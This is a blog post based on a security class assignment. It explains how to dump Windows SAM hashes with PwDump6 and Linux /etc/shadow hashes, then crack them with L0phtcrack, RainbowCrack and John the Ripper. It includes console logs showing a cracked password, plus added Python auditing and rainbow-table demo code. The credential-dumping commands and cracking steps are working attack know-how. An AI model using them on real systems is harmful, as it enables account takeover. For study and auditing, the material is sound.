Cracking Local Passwords
For a Network Security Class we were asked to prepare a brief document describing techniques used to crack both Windows LM hashes and Linux Shadow Hashes.
Though covered to death elsewhere I figured I might post it here anyway, just for kicks.
Enjoy!
PART ONE – PREPARATION
Required Tools:
Several tools are required before one can successfully crack local machine passwords on Linux or Windows. In order of appearance we will be using PwDump6 1.5.0, L0phtcrack 5, and Project RainbowCrack's rtgen.exe, rtsort.exe and rcrack.exe. For Linux we will be using cat, grep, and John the Ripper.
On the Windows machine that holds the target account you must place PwDump6. On the target Linux machine you need cat, grep, and John the Ripper. Most Linux distributions ship with cat and grep preinstalled, leaving only John the Ripper for you to install.
Administrator access is required on the Windows box so that PwDump has permission to inject into the LSASS process and reach the SAM file. On the Linux box, root (or wheel group) access is required in order to read the shadow password file.
PART TWO – WINDOWS PASSWORDS
Retrieving Hashes:
To begin we must obtain the hashes of the target accounts that we wish to crack, using the PwDump utility. On a Windows machine, passwords are hashed and stored within a protected system file known as the SAM file. The SAM file is accessible only to SYSTEM-level processes, so even our administrator-level access cannot read it directly.
To reach this SYSTEM-level file, PwDump uses a technique known as DLL injection to place its own executable code and resources within the address space of a process that already runs as SYSTEM (in this case the LSASS process). Once it has gained SYSTEM-level access it uses undocumented Windows API calls to extract the password hashes from the SAM file.
Steps to follow:
- Open a Windows shell and navigate to the directory where you installed PwDump6.
- Run pwdump.exe with the argument 127.0.0.1 (this runs the dump against the local machine):
  pwdump.exe 127.0.0.1
- Ensure that the hashes for the account you are targeting are shown.
- If they are, run the same command again, this time with the output redirected to a text file:
  pwdump.exe 127.0.0.1 > C:\hashes.txt
- Copy the hashes.txt file from the target machine to your cracking machine.
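Reading a pwdump file from the defender's side is just as useful as feeding it to a cracker: it tells you which accounts still have an LM hash stored at all, which is the only reason the rainbow tables in Part Two work. The following Python is an added example written for this post (it is not PwDump code and not part of the original write-up); it parses the user:rid:lm:nt::: format and reports hardening findings per account. The two sample lines are the accounts from the Windows console log in the appendix, and the EMPTY_LM / EMPTY_NT constants are the well-known hashes of the empty password, which pwdump6 prints as "NO PASSWORD***...".

```python
import re

# Well-known hashes of the empty password. pwdump6 prints "NO PASSWORD***..." in their place,
# so both spellings have to be recognised as "no usable hash here".
EMPTY_LM = "AAD3B435B51404EEAAD3B435B51404EE"
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"
EMPTY_LM_HALF = EMPTY_LM[:16]     # LM hash of a 7-byte half that is all padding
HEX32 = re.compile(r"^[0-9A-F]{32}$")

# Sample input: the two account lines from the Windows console log in the appendix of this post.
SAMPLE_PWDUMP = (
    "Administrator:500:NO PASSWORD*********************:NO PASSWORD*********************:::\n"
    "DummyAccount:1006:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:::\n"
)


def parse_pwdump_line(line: str) -> dict:
    """Split one user:rid:lm_hash:nt_hash::: record into its fields."""
    parts = line.rstrip("\n").split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        raise ValueError(f"not a pwdump record: {line!r}")
    return {"user": parts[0], "rid": int(parts[1]),
            "lm": parts[2].upper(), "nt": parts[3].upper()}


def _absent(field: str, empty_value: str) -> bool:
    """True when a hash field carries no usable hash (placeholder text or the empty hash)."""
    return field.startswith("NO PASSWORD") or field == empty_value or not HEX32.match(field)


def audit_account(rec: dict) -> list[str]:
    """Return hardening findings for one record; an empty list means nothing to flag."""
    findings = []
    if not _absent(rec["lm"], EMPTY_LM):
        # LM is case-insensitive and hashed as two independent 7-character halves,
        # which is exactly the weakness the rainbow tables in Part Two exploit.
        findings.append("LM hash stored: set NoLMHash (or use 15+ character passwords) "
                        "so that only the NT hash is kept")
        if rec["lm"].endswith(EMPTY_LM_HALF):
            findings.append("second LM half is the empty-half constant: "
                            "password is 7 characters or fewer")
    if _absent(rec["nt"], EMPTY_NT):
        findings.append("NT hash is the empty-password hash: set a password or disable the account")
    if rec["rid"] == 500:
        findings.append("built-in Administrator (RID 500): rename or disable when not needed")
    return findings


def audit_pwdump(text: str) -> dict[str, list[str]]:
    """Audit every record in pwdump output; returns {username: [findings]}."""
    records = (parse_pwdump_line(l) for l in text.splitlines() if l.strip())
    return {rec["user"]: audit_account(rec) for rec in records}


if __name__ == "__main__":
    for user, findings in audit_pwdump(SAMPLE_PWDUMP).items():
        print(user, "->", findings or ["ok"])
```

Run against a real dump, the LM finding is the one to act on first: the NoLMHash policy stops Windows from storing the LM hash on the next password change, after which a downloaded LM table has nothing to look up.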
Cracking with L0phtcrack:
- Start L0phtcrack and close the wizard that appears.
- Choose "Create a new LC5 Session" from the toolbar.
- Next click the "Session" menu item and choose "Import".
- Click "Import from a PwDump file".
- Click the browse button and point it at the hashes.txt file you obtained from the target machine.
- Next ensure that your password hashes were loaded into L0phtcrack with the correct account present.
- Finally, click the "Begin Audit" button.
- When the audit completes, copy down the recovered plaintext password.
Cracking with a Time/Memory Trade-Off:
Time/memory trade-off is a relatively new password cracking technique which trades greater memory consumption for less cracking time.
It works by spending time up front pre-computing the hashes of every candidate password within a keyspace (e.g. all alphanumeric characters, or all alphanumeric characters plus punctuation). These hashes are stored along with their plaintext values in an easily searchable, database-like format. When you later need a hash cracked, you search the table for that hash and read off the plaintext value that was originally used to compute it.
Computing a large-keyspace rainbow table for the LM hash algorithm would no doubt take a great deal of time and effort up front, but luckily for us the Shmoo Group provides several LM hash rainbow tables via BitTorrent.
Thus with a pre-computed rainbow table from the Shmoo Group we are able to crack passwords of a much more complicated nature while saving a great deal of time, all at the cost of a few gigabytes of cheap storage.
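To make the trade-off concrete, here is an added toy implementation (my own illustration for this post, not RainbowCrack's code and not how the Shmoo Group's tables are laid out). It builds a small rainbow table over a constructed three-letter keyspace with MD5 standing in for LM, stores only chain endpoints, and recovers a plaintext from a hash by regenerating the right chain. It then shows the defender's side of the story: LM is unsalted, so one downloaded table works against every Windows machine, whereas prepending a salt (the $1$kongSlLw$ value from the Linux hash in Part Three is used as a sample) moves the hashed input outside the keyspace the table was built over and the lookup returns nothing. Chain length and chain count are arbitrary demo values.

```python
import hashlib
from itertools import product

# Constructed toy keyspace: every 3-character lowercase string (26**3 = 17,576 candidates).
ALPHABET = "abcdefghijklmnopqrstuvwxyz"
KEYSPACE = ["".join(c) for c in product(ALPHABET, repeat=3)]

CHAIN_LEN = 100    # t: hash/reduce steps per chain (demo value)
NUM_CHAINS = 400   # m: chains kept; m*t hashes are precomputed but only m entries stored


def h(candidate: str) -> bytes:
    """The unsalted hash the table targets. MD5 stands in for LM here."""
    return hashlib.md5(candidate.encode()).digest()


def reduce_fn(digest: bytes, column: int) -> str:
    """Map a digest back into the keyspace. Folding in the column number gives every
    column its own reduction function; that is what makes this a rainbow table rather
    than a plain Hellman table and limits how badly chains merge."""
    n = (int.from_bytes(digest[:8], "big") + column) % len(KEYSPACE)
    return KEYSPACE[n]


def build_table() -> dict[str, list[str]]:
    """Precompute NUM_CHAINS chains, storing only endpoint -> [start points].
    A list per endpoint keeps chains that happen to share an endpoint."""
    table: dict[str, list[str]] = {}
    for i in range(NUM_CHAINS):
        start = KEYSPACE[(i * 7919) % len(KEYSPACE)]   # deterministic, well-spread starts
        p = start
        for column in range(CHAIN_LEN):
            p = reduce_fn(h(p), column)
        table.setdefault(p, []).append(start)
    return table


def lookup(table: dict[str, list[str]], target: bytes):
    """Return a preimage of target if it lies on some stored chain, else None."""
    for column in range(CHAIN_LEN - 1, -1, -1):
        # Hypothesis: target was the hash produced at this column. Walk to the chain end.
        p = reduce_fn(target, column)
        for later in range(column + 1, CHAIN_LEN):
            p = reduce_fn(h(p), later)
        for start in table.get(p, []):
            # Regenerate the candidate chain from its start and look for the target.
            q = start
            for col in range(CHAIN_LEN):
                if h(q) == target:
                    return q
                q = reduce_fn(h(q), col)
            # Falling through here is a false alarm: a merged chain shared the endpoint only.
    return None


def demo() -> tuple:
    """Crack one covered hash, then show that a salted hash is out of the table's reach."""
    table = build_table()
    hit = lookup(table, h("aaa"))                        # "aaa" is a start point, so it is covered
    # Salting: the input "kongSlLwaaa" is not a 3-letter string, so no chain can contain it.
    salted_miss = lookup(table, h("kongSlLw" + "aaa"))
    return hit, salted_miss


if __name__ == "__main__":
    print(demo())
```

The memory saving comes from storing m endpoints instead of m*t hashes, and the cost is paid in lookup time: each query may redo up to t*(t+1)/2 hash computations. Real tables such as the LM sets referenced above use the same idea with millions of chains and the LM DES-based hash in place of MD5.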
Steps to follow:
- Obtain a rainbow table for your desired keyspace from http://rainbowtables.shmoo.com/ using your favourite BitTorrent client.
- Extract the rainbow tables and run Project RainbowCrack's rtsort.exe on each file until all are sorted, where "lm_alpha…" is the name of the first rainbow table file:
  rtsort lm_alpha#1-7_0_2100x8000000_all.rt
- Next, from the directory that contains both the pwdump output file hashes.txt you created on the victim machine and the extracted, sorted rainbow tables, run the rcrack utility against it:
  rcrack *.rt -f hashes.txt
- Copy the resulting plaintext.
PART THREE – LINUX PASSWORDS
Retrieving Hashes:
Passwords on a Linux machine were once stored in the world-readable file /etc/passwd. In this day and age, however, most Linux distributions enable "shadowed passwords", which move the actual password hashes to the root-controlled file /etc/shadow.
Unlike on a Windows machine, no specialized tools are required to extract the hashes from this shadow file. Instead we only require root access and some rudimentary shell commands to filter the results down to the account we want.
Steps to follow:
- If required, elevate your privileges to those of the root account by means of su.
- With root privileges, read the /etc/shadow file and filter your target account's hash into a file within a directory under your control:
  sudo cat /etc/shadow | grep dummy > /home/Daniel/dummy_shadow.txt
- If required, transfer the dummy_shadow.txt hash file from the target machine to your cracking machine.
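The shadow record itself says a lot before any cracking starts. As an added illustration (written for this post, not taken from it or from any tool it mentions), the following Python parses the dummy account's line from the Linux console log in the appendix, decodes the $id$salt$hash layout and the days-since-epoch ageing field, and flags what a defender auditing /etc/shadow would act on: a $1$ prefix is MD5-crypt (what John reports as "FreeBSD MD5"), an old scheme with a fixed, low iteration count that brute-forces quickly compared with sha512crypt ($6$) or yescrypt ($y$); an empty password field means login with no password; a leading "!" or a bare "*" means the account is locked for password login. The second sample record is constructed to exercise the locked-account path.

```python
from datetime import date, timedelta

# Hash-scheme identifiers that appear between the first two "$" of a shadow password field.
SCHEMES = {
    "1": ("md5crypt", "weak"),     # what John the Ripper reports as "FreeBSD MD5"
    "2a": ("bcrypt", "ok"), "2b": ("bcrypt", "ok"), "2y": ("bcrypt", "ok"),
    "5": ("sha256crypt", "ok"),
    "6": ("sha512crypt", "ok"),
    "y": ("yescrypt", "ok"),
    "des": ("descrypt", "weak"),   # legacy 13-character field with no "$" prefix
}
EPOCH = date(1970, 1, 1)          # the "last change" field counts days from here

# Sample records: the dummy account from the Linux console log in the appendix of this
# post, plus a constructed locked service account.
SAMPLE_SHADOW = "dummy:$1$kongSlLw$dRDJ15w612hqhaAWN1vM20:13657:0:99999:7:::"
SAMPLE_LOCKED = "svc:!:13657:0:99999:7:::"


def parse_shadow_line(line: str) -> dict:
    """Split the nine colon-separated shadow fields and decode the password field."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError(f"expected 9 fields, got {len(fields)}: {line!r}")
    user, pw, lastchg, _minage, maxage, _warn, _inactive, _expire, _reserved = fields
    rec = {
        "user": user,
        "locked": pw.startswith("!") or pw == "*",    # password login disabled
        "empty": pw == "",                            # no password required at all
        "scheme": None, "salt": None, "hash": None,
        "last_change": EPOCH + timedelta(days=int(lastchg)) if lastchg else None,
        "max_age_days": int(maxage) if maxage else None,
    }
    if pw.startswith("$"):
        parts = pw.split("$")                         # ['', id, [params,] salt, hash]
        rec["scheme"] = parts[1]
        if rec["scheme"] in ("1", "5", "6", "y"):
            # The per-account salt is what defeats the precomputed tables from Part Two:
            # a table would have to be rebuilt for every distinct salt value.
            rec["salt"], rec["hash"] = parts[-2], parts[-1]
        else:
            rec["hash"] = pw                          # bcrypt packs salt and hash together
    elif pw and not rec["locked"]:
        rec["scheme"], rec["hash"] = "des", pw
    return rec


def audit_shadow_record(rec: dict) -> list[str]:
    """Return findings a defender would act on; an empty list means nothing to flag."""
    findings = []
    if rec["empty"]:
        findings.append("empty password field: the account can log in with no password")
    if rec["locked"] or rec["scheme"] is None:
        return findings
    name, strength = SCHEMES.get(rec["scheme"], ("unknown", "weak"))
    if strength == "weak":
        findings.append(f"{name} hash: re-hash with sha512crypt or yescrypt "
                        "(ENCRYPT_METHOD in /etc/login.defs, then force a password change)")
    return findings


if __name__ == "__main__":
    for line in (SAMPLE_SHADOW, SAMPLE_LOCKED):
        rec = parse_shadow_line(line)
        print(rec["user"], rec["scheme"], rec["salt"], rec["last_change"],
              audit_shadow_record(rec) or ["ok"])
```

Changing ENCRYPT_METHOD only affects hashes written from then on, so the weak-scheme finding stays until each flagged user actually changes their password; the decoded last_change date tells you how stale each hash is.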
Cracking with John the Ripper:
- Instruct John the Ripper to perform an incremental (brute-force) attack on your copied password hash:
  john --incremental /home/Daniel/dummy_shadow.txt
- When the password has been cracked, copy down the output of the following command:
  john --show /home/Daniel/dummy_shadow.txt
APPENDICES
Appendix 1 – Windows Console Log(s):
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\enduser>cd C:\pwdump6-1.5.0\pwdump6\PwDumpDebug
C:\pwdump6-1.5.0\pwdump6\PwDumpDebug>pwdump.exe 127.0.0.1
pwdump6 Version 1.5.0-BETA by fizzgig and the mighty group at foofus.net
** THIS IS A BETA VERSION! YOU HAVE BEEN WARNED. **
Copyright 2006 foofus.net
This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.
Using pipe {F1C04D50-1165-4614-A2B7-BC6B6906C755}
Key length is 16
Administrator:500:NO PASSWORD*********************:NO PASSWORD*********************:::
DummyAccount:1006:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:::
Completed.
Appendix 2 – Linux Console Log(s)
daniel@McCarneyPC:~$ sudo cat /etc/shadow | grep dummy
dummy:$1$kongSlLw$dRDJ15w612hqhaAWN1vM20:13657:0:99999:7:::
daniel@McCarneyPC:~$ sudo cat /etc/shadow | grep dummy >> /home/daniel/dummy_shadow.txt
daniel@McCarneyPC:~$
daniel@McCarneyPC:~$ john -incremental dummy_shadow.txt
Loaded 1 password (FreeBSD MD5 [32/64])
guesses: 0 time: 0:00:00:17 c/s: 4577 trying: 14811
guesses: 0 time: 0:00:00:22 c/s: 4653 trying: edj
guesses: 0 time: 0:00:00:24 c/s: 4607 trying: sarknete
guesses: 0 time: 0:00:00:25 c/s: 4750 trying: hut
guesses: 0 time: 0:00:00:27 c/s: 4702 trying: cook
guesses: 0 time: 0:00:00:29 c/s: 4660 trying: statese
guesses: 0 time: 0:00:00:31 c/s: 4623 trying: murety2
guesses: 0 time: 0:00:00:32 c/s: 4735 trying: clobly5
guesses: 0 time: 0:00:00:34 c/s: 4697 trying: crUADS
password (dummy)
guesses: 1 time: 0:00:00:54 c/s: 4700 trying: password
daniel@McCarneyPC:~$
daniel@McCarneyPC:~$ john -show dummy_shadow.txt
dummy:password:13657:0:99999:7:::
1 password cracked, 0 left
daniel@McCarneyPC:~$
Appendix 3 – Reference URLs
